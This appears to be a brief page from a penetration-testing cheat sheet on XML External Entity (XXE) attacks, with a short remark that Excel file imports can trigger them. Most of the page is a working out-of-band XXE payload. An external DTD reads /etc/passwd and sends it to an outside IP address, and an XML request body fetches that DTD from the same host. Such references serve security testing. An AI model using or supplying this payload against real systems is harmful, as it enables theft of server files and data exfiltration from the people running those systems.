search

XXE

XML External Entity attacks

hashtag
External DTD

test.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://20.71.182.195/?%p1;'>">
%p2;
http.request
Content-Type: application/xml
Content-Type: text/xml
..
<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://20.71.182.195/test.dtd">
    %ext;
]>
<message>&e1;</message>

hashtag
Excel Import

Excel is a zip file structure with XML docs. In case the application import XML files, there is a chance XXE will be processed.

LogoExploiting XXE with Excel4ARMEDchevron-right
Import Excel to invoke XXE
PreviousXSSNextNuclei

Last updated